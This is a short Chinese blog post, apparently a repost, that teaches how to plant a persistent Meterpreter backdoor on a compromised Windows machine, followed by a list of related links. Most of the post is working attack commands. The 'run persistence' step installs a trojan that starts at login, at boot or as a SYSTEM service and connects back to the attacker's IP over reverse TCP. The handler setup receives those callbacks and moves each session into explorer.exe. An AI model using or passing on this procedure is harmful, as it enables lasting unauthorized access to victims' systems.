meterpreter持久后门
meterpreter持久后门
背景:meterpreter好是好,但有个大问题,只要目标和本机连接断开一次后就再也连不上了,需要再次用exploit打才行!!!
解决方案:在与目标设备的meterpreter会话中创建一个持久后门(此后门将重新生成一个木马文件,并且该文件将周期性向服务端发送TCP请求)
具体步骤:
meterpreter > run persistence -U -i 5 -p 123 -r 192.168.1.71 =====>创建持久性后门
-A 自动启动一个匹配的exploit / multi / handler来连接到代理
-L 如果未使用%TEMP%,则在目标主机中写入有效负载的位置。
-P 有效负载使用,默认为windows / meterpreter / reverse_tcp。
-S 作为服务自动启动该木马(具有SYSTEM权限)
-T 要使用的备用可执行模板
-U 用户登录时自动启动该木马
-X 系统引导时自动启动该木马
-h 这个帮助菜单
-i 每次连接尝试之间的时间间隔(秒)
-p 运行Metasploit的系统正在侦听的端口
-r 运行Metasploit监听连接的系统的IP
此时就可以放心的断开与目标设备的session了,目标设备将周期性的向本机发送TCP请求,下次想连接此设备时只需做以下操作:
msfconsole
msf>use exploit/multi/handler ====>“handler”这个模块专门就是来做被动监听的,诱使目标执行任何木马后都可以用这个模块进行连接。(假如目标设备运行的meterpreter/reverse_tcp这个木马,则在服务端handler也set这个木马为payload即可)
msf>set PAYLOAD windows/meterpreter/reverse_tcp
msf>set LHOST 192.168.1.71
msf>set LPORT 123
msf>set exitonsession false ===>这个如果不设置为false的话,只要建立了一个session后就不再继续监听,想要再连接其他session需要再次run。反之,如果设为false,建立了一个session后还会继续监听,无需run即可建立多个session。
msf>set AutoRunScript migrate -N explorer.exe ===>一般模块都有AutoRunScript参数(需show advanced查看),此参数作用是:建立连接后自动执行后面的命令,此处即“migrate -N explorer.exe”
msf>run
转载于:https://www.cnblogs.com/baihualin/p/10431273.html
meterpreter持久后门相关推荐
- meterpreter会话渗透利用常用的32个命令归纳小结
仅作渗透测试技术实验之用,请勿针对任何未授权网络和设备. https://www.cnblogs.com/ssooking/p/6192995.html run vnc 无法操作的远程桌面 1.bac ...
- Meterpreter Guide
Croxy · 2015/11/04 16:10 由于网上很多文章乱而不全或者过期了 所以打算噜这篇来做个笔记- 方便自己以后查阅:) 0x01 入门篇(生成与接收) 功能介绍 msfpayload和 ...
- 20145226夏艺华 后门原理与实践
20145226夏艺华 后门原理与实践 实验主要内容 使用ncat.socat实现两台电脑间的后门连接:meterpreter的应用:MSF POST模块的使用 基础问题回答 例举你能想到的一个后门进 ...
- 20194307肖江宇Exp2—后门原理与实践
文章目录 20194307肖江宇Exp-2后门原理与实践 1.实验基础 1.1基础知识 1.2常用后门工具 NC和Netcat SoCat 任何代理.转发等功能都可以用该工具实现. Meterpret ...
- Kali Linux 安全渗透教程第一更
Kali Linux 安全渗透教程 目录 第1章 Linux安全渗透简介 1.1 什么是安全渗透 1.2 安全渗透所需工具 1.3 Kali Linux简介 1.4 安装Kali Linux ...
- Kali Linux安全渗透教程(内部资料)
Kali Linux安全渗透教程第一章(内部资料) 下载地址://pan.baidu.com/s/1dDnEL4P Kali Linux安全渗透教程第二章(内部资料) 下载地址:://pan.baid ...
- MSF(六):后渗透
后渗透测试 安全牛学习Metasploit Framework笔记 一.已经获得目标系统控制权后扩大战果 (1)提权 (2)信息收集 (3)渗透内网 (4)永久后门 二.基于已有session扩大战果 ...
- kail利用msf工具对ms17-010(永恒之蓝)漏洞入侵渗透Win7
kail利用msf工具对ms17-010(永恒之蓝)漏洞入侵渗透Win7 前言: 提到操作系统漏洞,大家肯定听说过耳熟能详的永恒之蓝(MS17-010)了,他的爆发源于WannaCry勒索病毒的诞生. ...
- 内网渗透测试:域内权限维持思路总结
我的Freebuf:https://www.freebuf.com/author/MrAnonymous 我的博客:https://whoamianony.top/ 文章目录 Windows 操作系统 ...
最新文章
- jQuery的效果方法
- 【Linux】一步一步学Linux——chage命令(92)
- .NET Core Docker使用初入篇
- string转成对象_非常简单的string驻留池,你对它真的了解吗
- 语音识别现在发展到什么阶段了?
- 系统架构师学习笔记_第六章(下)_连载
- TypeId和IidManager关系
- 数据库学习——SQL之SELECT查询语句
- python人脸考勤系统_python人脸考勤系统Python3多进程 multiprocessing 模块实例详解
- 免费开源的高性能JavaScript电子表格:X-Sheet入门体验
- 解决MATLAB帮助文档打不开的情况
- 「总结」最全2万字长文解读7大方向人脸数据集v2.0版
- uefi能重置系统吗_重装系统提示系统平台为uefi+gpt,无法进dos,请到pe中还原怎么办...
- 网上查的资料怎么打印?
- Distiller 安装时环境配置的一些可选项
- PHP经典高级工程师面试题
- 华为MIB关键字IOD查询地址及方法
- python图像处理教程,【图像处理】使用OpenCV+Python进行图像处理入门教程(二)...
- Python项目实战学习案例--股票模拟交易系统
- java项目第8期-在线游戏商城系统【毕业设计】